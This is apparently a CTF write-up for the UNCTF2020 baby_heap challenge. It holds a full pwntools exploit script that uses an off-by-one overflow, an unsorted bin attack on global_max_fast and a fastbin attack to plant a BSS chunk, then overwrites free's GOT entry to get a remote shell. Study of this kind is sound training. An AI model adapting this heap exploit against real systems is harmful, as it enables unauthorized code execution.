
    UNCTF2020 Unsorted bin attack global_max_fast & fastbin attack bss chunk baby_heap

    November 24, 2020 • Read: 967 • Pwn

    这道题大家都很熟悉了,这次用的是修改global_max_fast来使用fastbin attack的方法。
    官方wp真的不太看得懂,可能还要学习一下IO_File leak相关知识。
    官方wp的好处在于,保护全开的时候也能使用,主要是PIE和GOT。所以还是有学习的必要的。
    话不多说,看代码吧

    # -*- coding: utf-8 -*-
    from pwn import *
    # Local-process variant kept commented out; the script below targets the remote instance.
    #r = process('./pwn')
    r = remote('node2.hackingfor.fun', 35743)  # challenge host/port as given in the writeup
    elf = ELF('./pwn')  # local copy of the challenge binary; only elf.got['free'] is read later
    context.log_level = "debug"  # pwntools echoes every send/recv on the connection
    
    def en(c):
        """Parse `c` as a base-16 string and return its cube modulo 33.

        Used to decode the tokens the service prints after its banner; the
        exact encoding scheme is not documented on the page.
        """
        value = int(c, 16)
        return pow(value, 3, 33)
    
    def add_note(size):
        """Menu option 1: allocate a note of `size` bytes with placeholder content "a"."""
        replies = (
            (">> ", "1"),
            ("size?", str(size)),
            ("content?", "a"),
        )
        for prompt, answer in replies:
            r.sendlineafter(prompt, answer)
    
    def delete_note(idx):
        """Menu option 2: free the note stored at index `idx`."""
        for prompt, answer in ((">> ", "2"), ("index ?", str(idx))):
            r.sendlineafter(prompt, answer)
    
    def change_note(idx, content):
        """Menu option 4: overwrite the content of note `idx` with `content`.

        The payload goes through sendafter (no trailing newline), so the bytes
        arrive exactly as given.
        """
        menu_choice = "4"
        index_reply = str(idx)
        r.sendlineafter(">> ", menu_choice)
        r.sendlineafter("index ?", index_reply)
        r.sendafter("what is your new content ?", content)
    
    # Python 2 pwntools script (print statement, str payloads). Everything below
    # drives the service through `r` in a fixed order via the menu helpers
    # add_note / delete_note / change_note (options 1 / 2 / 4).
    r.recvuntil("welcome to game+++++++\n")
    # The line after the banner holds space-separated hex tokens; each is decoded
    # with en() and the first four are combined least-significant-first with
    # weights 16**i into the value the writeup calls free_list_addr.
    data = r.recvuntil("\n", drop=True).split(' ')
    free_list_addr = en(data[3]) * 0x1000 + en(data[2]) * 0x100 + en(data[1]) * 0x10 + en(data[0])
    print 'free_list_addr: ' + hex(free_list_addr)
    
    #malloc unsorted bin attack
    add_note(0x18) #0
    add_note(0x18) #1
    add_note(0x88) #2
    add_note(0x18) #3
    # 0x19 bytes into a 0x18-byte note: the trailing 0xb1 lands one byte past the
    # requested size (presumably the service does not bound this write).
    change_note(0, 'a' * 0x18 + '\xb1')
    delete_note(1)
    add_note(0x18) #1
    add_note(0x88) #4 == 2
    
    #malloc fastbin chunk
    # Same shape as the block above with a 0x68 note and a 0x91 overflow byte.
    add_note(0x18) #5
    add_note(0x18) #6
    add_note(0x68) #7
    add_note(0x18) #8
    change_note(5, 'a' * 0x18 + '\x91')
    delete_note(6)
    add_note(0x18) #6
    add_note(0x68) #9 == 7
    
    #unsorted bin attack(change global_max_fast)
    delete_note(2) #2
    # Note 4 aliases the freed note 2 (see "#4 == 2" above). Only the low 16 bits
    # of free_list_addr are written here (p16), after an 8-byte zero word.
    change_note(4, p64(0) + p16(free_list_addr))
    add_note(0x88) #2
    
    #fastbin attack
    delete_note(7) #7
    #UAF => BSS Chunk
    # 0x6020C0 and the -0x13 adjustment are binary-specific constants from the
    # writeup; a fixed address like this presumes the binary is built without PIE.
    change_note(9, p64(0x6020C0 - 0x13)) #BSS chunk
    add_note(0x68) #7
    add_note(0x68) #10 BSS Chunk
    # Table of 32-bit values written through note 10 (the one placed at the BSS
    # address); the page describes it as rewriting the stored note sizes.
    size_payload = 'a' * 0x3 + p32(0x19) + p32(0x19) + p32(0x89) + p32(0x19) \
                   + p32(0x89) + p32(0x19) + p32(0x19) + p32(0x69) \
                   + p32(0x19) + p32(0x69) + p32(0xFFFF) + p32(0)
    change_note(10, size_payload) #change size
    # Second write extends the table with free@GOT (the only use of `elf`), so a
    # note pointer presumably ends up referring to the GOT entry written next.
    change_note(10, size_payload + p64(0) * 2 * 7 + p64(elf.got['free'])) #change ptr_pool
    
    # 0x40097F is a hard-coded address from the writeup; the original comment
    # says this redirects free() to a shell.
    change_note(0, p64(0x40097F)) #change_free_got => shell
    #gdb.attach(r)
    # Freeing note 0 calls through the overwritten GOT entry.
    delete_note(0) #getshell
    r.interactive()
    